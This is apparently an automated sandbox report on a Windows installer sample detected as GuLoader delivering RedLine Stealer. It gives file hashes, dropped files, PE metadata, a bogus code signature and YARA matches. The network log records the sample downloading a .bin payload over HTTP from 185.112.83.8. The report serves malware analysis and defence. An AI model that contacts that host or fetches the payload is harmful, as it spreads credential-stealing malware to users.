                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

Time | Type | Description
11:02:49 | API Interceptor | 10x Sleep call for process: o4XzTr73Ut.exe modified

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                No context

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                No context

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\o4XzTr73Ut.exe.log
Process: C:\Users\user\Desktop\o4XzTr73Ut.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 2291
Entropy (8bit): 5.3192079301865585
Encrypted: false
SSDEEP: 48:MIHKmfHK5HKXAHKhBHKdHKB1AHKzvQTHmYHKhQnoPtHoxHImHKoLHG1qHqHAH5HX:Pqaq5qXAqLqdqUqzcGYqhQnoPtIxHbq4
MD5: 783E1AFC27D9A1FBDE01BD45717038D2
SHA1: 2D1A63904EB34F007205C76A58C51187B924BC7A
SHA-256: 1DF0D64E98D18613726435EE666629A6B010A8EBB7BE3EB90EFB114013493B15
SHA-512: 394BB2A7FCDDAC032F032C426C792A9211AF95A6012180CBE576C78FC0DDB1B876C7D28912117A26F117D95CBA2E6DB18F9E3C04DEF00421F41E0C6AD09D3485
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b
C:\Users\user\AppData\Local\Temp\Roqueforter8.dat
Process: C:\Users\user\Desktop\o4XzTr73Ut.exe
File Type: DOS executable (COM)
Category: dropped
Size (bytes): 47562
Entropy (8bit): 7.721891011566723
Encrypted: false
SSDEEP: 768:X8MEeT9K2b7oV3U/DTT6MviYn6PMoyqxekjpbNmUfFnm0LxfK/Zj1s8zLgwVTJN:X7N7b7oJqT6o6PMoNj9pfFNdfK/Zje8Z
MD5: E4BF7919055573F5F2BCBD83F629E0FF
SHA1: 16DD448BDF60119973E5A1395F025240AF96CF16
SHA-256: 96B00AB5DD8E21EAD05BBF575260C7590E60B17FB2703CAFE3569C8EB2B10E2A
SHA-512: CE14C25F7DE4A318F6CF70879327A6F093C4B1E270CDC5BA025E958C2D75CC27C1DD1740857A3EC9776B5DE2E5C768F7D2E0EB95D9F448E7C443567F53FAFD20
Malicious: false
Reputation: low
                                                                                                                                                Preview: .W_.?.u.....u.....u........h.....4$..p..,$.....$.UA...$...W.,$.R..Z1..4.2..J....9.u.W.......).J2}.F..K.9.ICV5..S~t6..y.mT3.z|.'.F..2..4...E.....8f....h...?).LS..gDb....E..s...#...G....i.WT)S...m.eC.......;..Z..G.N. .n.m..E._M.t...iL[>k=!..pa.&@.&.a.....:.Q.u.eF^..#7....+...O[z.D?...0.,.j.|.Tv......E....,.9I7.F.4.-A.;.L.....7.A..#....K7.}',.p^..D..!D........J2..J.....E(J2...w.......L.J.......0....1.2.I.b..J.4.<@....1......W..$T|...|.H2.(lI...w.D.T|....z..yY.Ni.J......D....>.....9..Vi.J.!I....J.tJ2.I....J.?.....J2....1.J2...2.........tK.}A>..\<..A>.........x.n:.J......8.z...?2s.7...|/.-.03.~......%.L.$.v.".......%$..t...>.O+....>.vAN..=w.pu.0...3.0...UF.x6Q.......~.5...4.0.x.Z..U.......Dr.y.Z..9.k......J25...."..{....J.....R.......6u.....sV.b..{.r...Lg...NB.~RA~.._w.5.s.O...n..'.a...6..=9.yl8L..2.N....D5..W+dd6c.:...[.I....J..f...~!.}...".x.PT.?......e=x.9.C..../....Mj.5...........jM(......5.J25.UAL."~|......Z.?>.5....i....r.|Af.w.!:5..;..K2.I.JY.."A~.%.M.5
C:\Users\user\AppData\Local\Temp\a.txt
Process: C:\Users\user\Desktop\o4XzTr73Ut.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 23
Entropy (8bit): 2.2068570640942187
Encrypted: false
SSDEEP: 3:jNDBfN:jNVfN
MD5: 6C3AA179406696C66ACF8DC984ABC7DF
SHA1: 7F66AB35CA41A3449382F9DA68864D64EC182F28
SHA-256: 798DF5B3298985AE022F8C5A6714F7891EAA49B2E4B24E3A8B2329C04DD11C71
SHA-512: 7551B1FBE1CAEF52FD0AFC8601DCD0D6F013198FCC7CBF57F42EB090577B34B91E6F4ADCE1A76BC7FFD95559A3FDD529FE6DE90B8335EF8E901CBB606DDAE836
Malicious: false
Reputation: low
Preview: ghdfhjfghfgjfdghfghfgdh
C:\Users\user\AppData\Local\Temp\nsb3A92.tmp\System.dll
Process: C:\Users\user\Desktop\o4XzTr73Ut.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 12288
Entropy (8bit): 5.814115788739565
Encrypted: false
SSDEEP: 192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5: CFF85C549D536F651D4FB8387F1976F2
SHA1: D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256: 8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512: 531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
Reputation: moderate, very likely benign file
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.533807802412177
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: o4XzTr73Ut.exe
File size: 96864
MD5: f65536b785611d1b549e8d866fc898ee
SHA1: ac5d59453273ad0b026d1cd244c422cc020b94b0
SHA256: a319ca95679f9e8a30001a66ec55403a08be8c7398916746baea02c6c6539d02
SHA512: 9b70f75e5f3345062301b12ddf8572b63adfcfeb6b40b518d53e3f639c47c2de43d7f8e84f975a08a092ef9cb7adedf4c1a1d47458e37932906e8972f67aff59
SSDEEP: 1536:4/T2X/jN2vxZz0DTHUpouMJbdxE+1KloObnlpRaH3OS3kg/S5ERghv0HUxyEMbq:4bG7N2kDTHUpouMJbdPKlJnjRaH+ckgj
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

File Icon

Icon Hash: b2a88c96b2ca6a72

Static PE Info

General

Entrypoint: 0x40352d
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 56a78d55f3f7af51443e58e0ce2fb5f6

Authenticode Signature

Signature Valid: false
Signature Issuer: E=levetiderne@KONTRAKTTILLGS.Kyp, CN=QUINTONS, OU=combination, O=Udgangsvrdier8, L=Sley, S=CLUBBISM, C=CM
Signature Validation Error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number: -2146762487
Not Before, Not After:
• Not Before: 12/16/2021 10:00:21 PM; Not After: 12/16/2022 10:00:21 PM
Subject Chain:
• E=levetiderne@KONTRAKTTILLGS.Kyp, CN=QUINTONS, OU=combination, O=Udgangsvrdier8, L=Sley, S=CLUBBISM, C=CM
Version: 3
Thumbprint MD5: 2EC09EDC6480E7CDEFC44E7B6A5E4B8A
Thumbprint SHA-1: 09814829AF7074F3F52699D26B6437E17015A39A
Thumbprint SHA-256: EB9CD30C7ADCEFF3D27D60F0782C18644451949B47FA202806C7BF240695F889
Serial: 00

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007F1ED0B3128Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007F1ED0B3125Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [00434FB8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x8610           0xa0          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x4c000          0xe48         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x165f8          0x1468        .data
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x2b0         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x6897        0x6a00    False     0.666126179245   data       6.45839821493  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x8000           0x14a6        0x1600    False     0.439275568182   data       5.02410928126  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xa000           0x2b018       0x600     False     0.521484375      data       4.15458210409  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata  0x36000          0x16000       0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc   0x4c000          0xe48         0x1000    False     0.38916015625    data       4.02680822028  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x4c208 | 0x2e8 | data | English | United States
RT_DIALOG | 0x4c4f0 | 0x100 | data | English | United States
RT_DIALOG | 0x4c5f0 | 0x11c | data | English | United States
RT_DIALOG | 0x4c710 | 0xc4 | data | English | United States
RT_DIALOG | 0x4c7d8 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x4c838 | 0x14 | data | English | United States
RT_VERSION | 0x4c850 | 0x2b4 | data | English | United States
RT_MANIFEST | 0x4cb08 | 0x33e | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Version Infos

Description | Data
LegalCopyright | Asilum
FileVersion | 1.2.3
CompanyName | Asilum company
LegalTrademarks | Asilum is a trademark of Asilum company
Comments | Asilum
ProductName | Asilum Application
FileDescription | Asilum Application
Translation | 0x0409 0x04b0

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
12/20/21-11:02:26.621888 | TCP | 2018752 | ET TROJAN Generic .bin download from Dotted Quad | 49806 | 80 | 192.168.2.4 | 185.112.83.8

Network Port Distribution

TCP Packets


                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • 185.112.83.8

                                                                                                                                                HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49806 | 185.112.83.8 | 80 | C:\Users\user\Desktop\o4XzTr73Ut.exe
Timestamp | kBytes transferred | Direction | Data
Dec 20, 2021 11:02:26.621887922 CET | 10005 | OUT | GET /SoftwareCleanedPhilosf.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 185.112.83.8
Cache-Control: no-cache
Dec 20, 2021 11:02:26.676671028 CET | 10006 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 16 Dec 2021 20:58:22 GMT
Accept-Ranges: bytes
ETag: "ba849aa9bff2d71:0"
Server: Microsoft-IIS/10.0
Date: Mon, 20 Dec 2021 10:02:22 GMT
Content-Length: 190016


                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                Behavior


                                                                                                                                                System Behavior

                                                                                                                                                General

Start time: 10:59:48
Start date: 20/12/2021
Path: C:\Users\user\Desktop\o4XzTr73Ut.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\o4XzTr73Ut.exe"
Imagebase: 0x400000
File size: 96864 bytes
MD5 hash: F65536B785611D1B549E8D866FC898EE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.843188696.00000000028A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation: low

                                                                                                                                                General

Start time: 11:01:10
Start date: 20/12/2021
Path: C:\Users\user\Desktop\o4XzTr73Ut.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\o4XzTr73Ut.exe"
Imagebase: 0x400000
File size: 96864 bytes
MD5 hash: F65536B785611D1B549E8D866FC898EE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000000.841548004.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.1061972250.0000000020640000.00000004.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.1061316952.000000001F5F7000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.1060215267.000000001E3E0000.00000004.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000003.1004258087.000000000089A000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.1060066764.000000001E130000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis
